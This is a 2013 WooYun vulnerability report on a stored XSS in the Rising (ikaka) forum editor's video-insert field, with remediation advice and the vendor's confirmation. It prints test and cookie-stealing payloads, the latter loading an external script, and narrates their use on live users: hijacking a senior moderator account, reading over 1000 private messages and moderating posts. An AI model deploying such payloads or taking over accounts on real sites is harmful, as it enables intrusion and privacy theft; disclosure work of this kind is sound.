当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033648

漏洞标题:对瑞星1rank储存型xss的分析与利用(xss如何变废为宝)

相关厂商:RiSing

漏洞作者: px1624

提交时间:2013-08-06 17:19

修复时间:2013-09-20 17:20

公开时间:2013-09-20 17:20

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-06: 细节已通知厂商并且等待厂商处理中
2013-08-06: 厂商已经确认,细节仅向厂商公开
2013-08-16: 细节向核心白帽子及相关领域专家公开
2013-08-26: 细节向普通白帽子公开
2013-09-05: 细节向实习白帽子公开
2013-09-20: 细节向公众公开

简要描述:

发现瑞星给好多储存型xss只给1rank,难道储存型xss的危害价值在瑞星看来就只值1rank?此漏洞附有比较长的xss挖掘与利用的分析,喜欢看XSS漏洞分析,以及不知道XSS能干嘛的可以关注看看。同时希望可以引起厂商对于xss漏洞的重视~

详细说明:

漏洞位置:论坛发帖回帖富文本编辑器
漏洞危害:
1 盗取用户登录cookie并成功登录
2 论坛等位置xss蠕虫
3 盗取管理员帐号获得大量敏感信息和操作权限
详细过程这里分两个部分:
一、XSS的挖掘分析
1 首先是看到一些储存型xss漏洞只给1rank比较气愤,觉得厂商不重视,在看到二哥gainover的回复,决定去挖掘实例让厂商引起对xss的重视度。传送门: WooYun: 偶然发现的卡卡论坛存储型xss...

1.png


2 开始xss挖掘过程,这里我定位到论坛的发帖回帖富文本编辑器位置。因为论坛的用户量比较大,而且富文本编辑器位置往往容易出现xss。测试的时候,一般随便选一个帖子在回复位置测试,不要去发帖子测试。因为回帖和发帖的位置一般都用的是一个富文本,回帖位置比较隐蔽,不易被发现。
3 先直接测试有没有过滤常用xss代码,输入

</textarea>'"><img src=1 onerror=alert(1)>

发现被直接输出了,看来常用的xss代码是有过滤的。F12看了一下输出点,也没有找到其他什么可以构造的xss点。

000.png


4 下来就测试一下其他位置吧,随便输入一些字符,试了试插图,这里也过滤了。

2.png


5 然后在发帖后点击编辑,看到了这里多了个插入视频选项,这下眼前一亮诶。

3.png


6 看到这个论坛的模式和编辑器很像discuz phpwind那些,所以果断插入代码:javascript:alert(1) 文件类型选择mp3

4.png


7 确认保存提交修改内容,吼吼,弹窗了。

5.png


8 F12看一下,发现这里是用到<embed>标签,所以可以直接在src位置利用javascript加载js代码。

6.png


9 好的,XSS的挖掘分析到此结束。
二、XSS的利用分析
1 首先F12看了下,发现论坛的cookie是没有http-only的,那么只要能xss到cookie,理论上来说就可以利用用户的登录cookie去登录用户帐号。

666.png


2 所以发了一个带有盗用用户cookie的xss的帖子(帖子的标题是为了引诱管理员过来)。
利用代码为:

javascript:with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='外部js文件地址'


7.png


3 自己先试了试可以成功获取到cookie,然后不一会就收到了一些cookie(由于是自动加载,所以只要访问帖子就会中招)。

77.png


4 利用xss到的cookie,成功登录的用户帐号。

8.png


5 看了下,果然是因为访问了那个帖子中招的。

9.png


6 再看了看信息,呵呵,完全和我计划的一样,搞的了大版主帐号。

10.png


7 下面就是利用大版主的帐号可以干的事情了,由于cookie没有http-only,而且是一站式cookie,所以能干的事情也蛮多的额。
对任意用户进行禁言等操作

11.png


12.png


对任意帖子进行删除、指定、加精等操作

13.png


短消息邮箱里面的1000多条用户的安全信息及隐私信息

14.png


瑞星网站的其他站点的业务操作

15.png


8 看了一下,论坛的发帖回帖等操作都是没有token等参数的,所以可以蠕虫,这里不在详细进行展示了。如需验证,可以私下联系我。

漏洞证明:

插入盗取cookie的帖子的地址:

http://bbs.ikaka.com/showtopic.aspx?page=end&topicid=9251068#11942968


这个帖子也插了条,在回复位置:

http://bbs.ikaka.com/showtopic-9250670.aspx

修复方案:

1 过滤下javascript字符串
2 post请求加token
3 没见过你们送礼物额~

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-08-06 17:33

厂商回复:

3Q。。。

最新状态:

暂无